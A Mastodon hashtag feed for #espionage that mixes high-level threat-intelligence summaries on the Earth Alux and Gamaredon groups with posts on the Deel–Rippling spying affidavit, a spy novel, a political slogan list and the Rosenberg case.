Login

Recent searches

No recent searches

Search options

Only available when logged in.
masto.ai is one of the many independent Mastodon servers you can use to participate in the fediverse.
A general Mastodon server for all languages.

Administered by:

Server stats:

2.2K
active users

masto.ai: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.3.4

#espionage

14 posts14 participants1 post today
Public
OTX Bot

The Espionage Toolkit: A Closer Look at its Advanced Techniques

Earth Alux, a China-linked APT group, is actively conducting cyberespionage attacks against key sectors in the APAC and Latin American regions. The group exploits vulnerable services in exposed servers to gain initial access and deploys web shells like GODZILLA. Their primary backdoor, VARGEIT, is used alongside COBEACON for various stages of attack. Earth Alux employs advanced techniques such as DLL side-loading, anti-API hooking, and execution guardrails. They utilize tools like RAILLOAD and RAILSETTER for persistence and evasion. The group's capabilities include system information collection, file manipulation, command execution, and tool injection via mspaint processes. Earth Alux targets industries such as government, technology, logistics, and manufacturing, demonstrating a strategic focus on high-value information across different sectors.

Pulse ID: 67ea7b3862f607c0d857f9d8
Pulse Link: otx.alienvault.com/pulse/67ea7
Pulse Author: AlienVault
Created: 2025-03-31 11:23:36

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#APAC#BackDoor#China
Public *
⚯ Michel de Cryptadamus ⚯

First payment for #Deel’s corporate espionage plot against Rippling was paid through a #Revolut account. Subsequent payments were made using crypto (ethereum), because the CEO of Deel believed (incorrectly) such payments would “leave no trace”.

When they got caught the CEO of Deel told the spy to destroy his electronic devices and offered to relocate them to #Dubai.

I would bet an enormous amount of money that any HR/payroll companies like Deel that engage in corporate espionage and offer to relocate people to Dubai are also laundering money for #Russia and/or Iran.

“In the land of the coins the man who makes it to Dubai is king.”

* Full affidavit: newcomer.co/api/v1/file/574f21
* Thread with some fun details: x.com/tbpn/status/190743755713

@tbpn Alex, the CEO of Deel, told the spy he "had an idea." He suggested that H H H L " the spy remain at Rippling and become a "spy" for Deel, and the spy recalls Alex specifically mentioning James Bond. 1 Begin Spying for Deel 6. In or around the end of September 2024, | let Alex Bouaziz know | was considering leaving Rippling to pursue full time consulting work. Alex suggested that we discuss my career considerations, and we spoke on a WhatsApp call shortly thereafter. That was my first phone call with Alex; previously we had exchanged the occasional message on LinkedIn or WhatsApp. | took the WhatsApp call with Alex from a meeting room at Rippling’s Dublin office, while | was at work. Alex told me he “had an idea.” He suggested that | remain at Rippling and become a “spy” for Deel, and | recall him specifically mentioning James Bond. | asked him what he meant He said he would offer me a monetary reward if | agreed to spy on Rippling for Deel. | told him | would have to think about it 7 Ahnut thirty minutes later | called Alex hack aver WhatsAnn and told him that | was onboard 10:18 AM - Apr 2, 2025 - 13K Views
The Payment Arrangement 12. | received my first payment in the beginning of November into my Revolut account from an account associated with an individual named “A.B." The payment was $6,000 USD. A copy of the transfer record is at Tab 1 to the Book of Exhibits. | did not know who A.B. was at the time. | have since learned that A.B. stands for Alba Basha, as denoted on the Revolut transaction receipt, and that Alba Basha is Dan Westgarth's wife. Dan is the COO of Deel. 13. Soon after | received the initial payment, Philippe Bouaziz informed me that future payments would be made via cryptocurrency, as this method would leave “no trace.” From then on, | concerned about cryptocurrency fluctuation, | would then liquify the funds into fiat currency and place them into my AIB bank account. A copy of my Blockchain.com account and transfer records from my Blockchain.com account to my AIB account are at Tabs 2 and 3 of the Book of Exhibits.
#moneylaundering#crypto#crime
Public
Speckled Band

♟️The Cooler (1974) was a spy novel written by George Markstein, co-creator of 1960s surreal espionage series The Prisoner. It’s based on the real-life Inverlair Lodge, a ‘retirement home for spies’, which also inspired The Prisoner. It was long out of print but is now available again, with a striking cover - plumeriapics.co.uk/shop/ols/pr

www.speckled.band

Cover of The Cooler
George Markstein’s Prisoner cameo (in Many Happy Returns)
Patrick McGoohan as Number Six in The Prisoner
Inverlair Lodge, near Inverness
#theprisoner#1960s#prisoner
Continued thread
Public
Bohemian Peasant

❌ If you threaten the #media, you oppose free speech.

❌ If you attempt to erase #history, you oppose #truth.

❌ If you support white supremacy, you support #racism.

❌ If you oppose the Institute of #Peace, you support #war.

❌ If you oppose #immigrants and #refugees, you support #genocide.

❌ If you oppose appropriations, you oppose #Congress.

❌ If you oppose national security, you support #espionage.

#freespeech#nationalsecurity#whitesupremacy
Public
MikeDunnAuthor

Today in Labor History March 29, 1951: Julius and Ethel Rosenberg were convicted of conspiracy to commit espionage. They were executed at Sing Sing in 1953. The Rosenberg’s sons, Michael and Robert Meeropol were adopted by Abel Meeropol, the composer of “Strange Fruit,” (made famous by Billie Holiday). The sons maintained their parents’ innocence. However, after the fall of the Soviet Union, decoded Soviet cables showed that their father had, in fact, collaborated, but that their mother was innocent. They continued to fight for the mother’s pardon, but Obama refused to grant it. The Rosenberg’s sons were among the last students to attend the anarchist Modern School, in Lakewood, New Jersey, before it finally shut its doors in 1958.

The Modern School movement began in 1901, in Barcelona, Spain, when Francisco Ferrer opened his Escuela Moderna. It was one of the very first Spanish schools to be fully secular, co-educational, and open to all students, regardless of class. His ideas were so popular that 40 more Modern Schools opened in Barcelona in just a few years, while 80 other schools adopted his textbooks. In 1909, there were mass protests and a General Strike against Spanish intervention in Morocco. The state responded with a week of terror and repression, during which they slaughtered over 600 workers and falsely executed Ferrer as an instigator of the protests. His execution led to worldwide protests. Modern Schools started to pop up outside of Spain, inspired by his original Escuela Moderna, including 20 in the U.S.

For more on the Modern School movement, read my article: michaeldunnauthor.com/2022/04/

Julius and Ethel Rosenberg, separated by heavy wire screen, as they leave U.S. Court House after being found guilty by jury. Ethyl is wearing a bonnet. Julius has glasses, and a thin mustache. By Roger Higgins, photographer from "New York World-Telegram and the Sun" - Library of Congress Prints and Photographs Division. New York World-Telegram and the Sun Newspaper Photograph Collection. http://hdl.loc.gov/loc.pnp/cph.3c17772, Public Domain, https://commons.wikimedia.org/w/index.php?curid=1309692
#workingclass#LaborHistory#deathpenalty
Public
Christoffer S.

(talosintelligence.com) Gamaredon APT Targets Ukraine with Remcos Backdoor Using War-Themed Lures blog.talosintelligence.com/gam

Cisco Talos is tracking a campaign targeting Ukrainian users with malicious LNK files that deliver the Remcos backdoor. The campaign, attributed with medium confidence to the Gamaredon APT group, uses Russian-language lures related to troop movements in Ukraine. The attack chain involves LNK files that execute PowerShell code to download a ZIP file containing the Remcos backdoor, which is then executed through DLL side-loading techniques. The attackers use geo-fenced servers in Russia and Germany that restrict access to Ukrainian IP addresses. This represents a continuation of Gamaredon's targeting of Ukrainian entities, though their use of the commercial Remcos backdoor marks a shift from their typical custom tooling.

Cisco Talos Blog · Gamaredon campaign abuses LNK files to distribute Remcos backdoorCisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.
#Cybersecurity#ThreatIntel#Gamaredon
ExploreLive feeds
About